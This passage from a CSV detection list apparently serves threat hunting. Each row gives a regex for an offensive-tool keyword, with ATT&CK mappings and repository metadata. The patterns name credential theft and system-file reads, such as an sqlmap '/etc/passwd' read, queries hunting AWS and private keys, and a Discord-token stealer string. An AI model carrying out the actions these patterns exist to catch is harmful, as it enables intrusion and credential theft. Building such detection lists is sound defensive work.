custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*FilelessShellcode.vcxproj*",".{0,1000}FilelessShellcode\.vcxproj.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*FileMonitor has injected FileMonitorHook into process *",".{0,1000}FileMonitor\shas\sinjected\sFileMonitorHook\sinto\sprocess\s.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","10","2","154","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z" "*filemsf.py*",".{0,1000}filemsf\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*--file-read=/etc/passwd*",".{0,1000}\-\-file\-read\=\/etc\/passwd.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation 
tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*files/BindShell.exe*",".{0,1000}files\/BindShell\.exe.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*files/team-edward.py*",".{0,1000}files\/team\-edward\.py.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*filetype:credentials* AND ((client_id OR clientID) AND (tenant) AND (secret))*",".{0,1000}filetype\:credentials.{0,1000}\sAND\s\(\(client_id\sOR\sclientID\)\sAND\s\(tenant\)\sAND\s\(secret\)\).{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*filetype:credentials* AND (\""AWS_ACCESS_KEY_ID\"" OR \""AWS_SECRET_ACCESS_KEY\""*",".{0,1000}filetype\:credentials.{0,1000}\sAND\s\(\\\""AWS_ACCESS_KEY_ID\\\""\sOR\s\\\""AWS_SECRET_ACCESS_KEY\\\"".{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*filetype:credentials* AND (begin NEAR(n=1) (RSA OR 
OPENSSH OR DSA OR EC OR PGP) NEAR(n=1) KEY)*",".{0,1000}filetype\:credentials.{0,1000}\sAND\s\(begin\sNEAR\(n\=1\)\s\(RSA\sOR\sOPENSSH\sOR\sDSA\sOR\sEC\sOR\sPGP\)\sNEAR\(n\=1\)\sKEY\).{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*filetype:pem*AND (\""BEGIN RSA PRIVATE KEY\"" OR \""BEGIN DSA PRIVATE KEY\"" OR \""BEGIN EC PRIVATE KEY\*",".{0,1000}filetype\:pem.{0,1000}AND\s\(\\\""BEGIN\sRSA\sPRIVATE\sKEY\\\""\sOR\s\\\""BEGIN\sDSA\sPRIVATE\sKEY\\\""\sOR\s\\\""BEGIN\sEC\sPRIVATE\sKEY\\.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*filezilla2john.py*",".{0,1000}filezilla2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*fin3ss3g0d/ASPJinjaObfuscator*",".{0,1000}fin3ss3g0d\/ASPJinjaObfuscator.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005?","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","1","N/A","8","1","60","11","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z" "*finalrecon.py --*",".{0,1000}finalrecon\.py\s\-\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds 
of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*find . -name spring-beans*.jar*",".{0,1000}find\s\.\s\-name\sspring\-beans.{0,1000}\.jar.{0,1000}","offensive_tool_keyword","Spring4Shell","Spring4Shell Proof Of Concept/Information CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/BobTheShoplifter/Spring4Shell-POC","1","0","N/A","N/A","4","347","105","2022-11-09T15:46:06Z","2022-03-30T07:54:45Z" "*find / * -4000 -type f -print*",".{0,1000}find\s\/\s.{0,1000}\s\-4000\s\-type\sf\s\-print.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*find / * -perm -2000 -type f -print*",".{0,1000}find\s\/\s.{0,1000}\s\-perm\s\-2000\s\-type\sf\s\-print.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*find / * -regextype egrep -iregex*\.kdbx*",".{0,1000}find\s\/\s.{0,1000}\s\-regextype\segrep\s\-iregex.{0,1000}\\\.kdbx.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege 
Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*find_and_load_coerce_methods*",".{0,1000}find_and_load_coerce_methods.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*find_domain.sh *",".{0,1000}find_domain\.sh\s.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*find_payload(*",".{0,1000}find_payload\(.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic 
Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*Find-4624Logons*",".{0,1000}Find\-4624Logons.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 
"*Find-4648Logons*",".{0,1000}Find\-4648Logons.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-ADInterestingACL *",".{0,1000}Find\-ADInterestingACL\s.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - 
TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","0","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*Find-ADInterestingACL.ps1*",".{0,1000}Find\-ADInterestingACL\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","1","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*FindAdminAccessComputers*",".{0,1000}FindAdminAccessComputers.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*Find-AdminLogonScripts.ps1*",".{0,1000}Find\-AdminLogonScripts\.ps1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*findall(r""dQw4w9WgXcQ*",".{0,1000}findall\(r\""dQw4w9WgXcQ.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - 
TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*find-allvulns*",".{0,1000}find\-allvulns.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Find-AmsiAstSignatures -*",".{0,1000}Find\-AmsiAstSignatures\s\-.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*Find-AmsiPSTokenSignatures -*",".{0,1000}Find\-AmsiPSTokenSignatures\s\-.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*Find-AmsiSignatures.ps1*",".{0,1000}Find\-AmsiSignatures\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*Find-AppLockerLogs*",".{0,1000}Find\-AppLockerLogs.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-AVSignature*",".{0,1000}Find\-AVSignature.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid 
penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Find-BadPrivilege.json*",".{0,1000}Find\-BadPrivilege\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Find-BadPrivileges-DomainComputers.ps1*",".{0,1000}Find\-BadPrivileges\-DomainComputers\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Find-ComputersWithRemoteAccessPolicies.json*",".{0,1000}Find\-ComputersWithRemoteAccessPolicies\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Find-ComputersWithRemoteAccessPolicies.ps1*",".{0,1000}Find\-ComputersWithRemoteAccessPolicies\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - 
T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Find-DangerousACLPermissions*",".{0,1000}Find\-DangerousACLPermissions.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*findDelegation.py -dc-ip *",".{0,1000}findDelegation\.py\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*findDelegation.py*",".{0,1000}findDelegation\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*Find-DomainShare -*",".{0,1000}Find\-DomainShare\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-DomainShare -CheckShareAccess*",".{0,1000}Find\-DomainShare\s\-CheckShareAccess.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-FileWMImplant*",".{0,1000}Find\-FileWMImplant.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*Find-Fruit.*",".{0,1000}Find\-Fruit\..{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. 
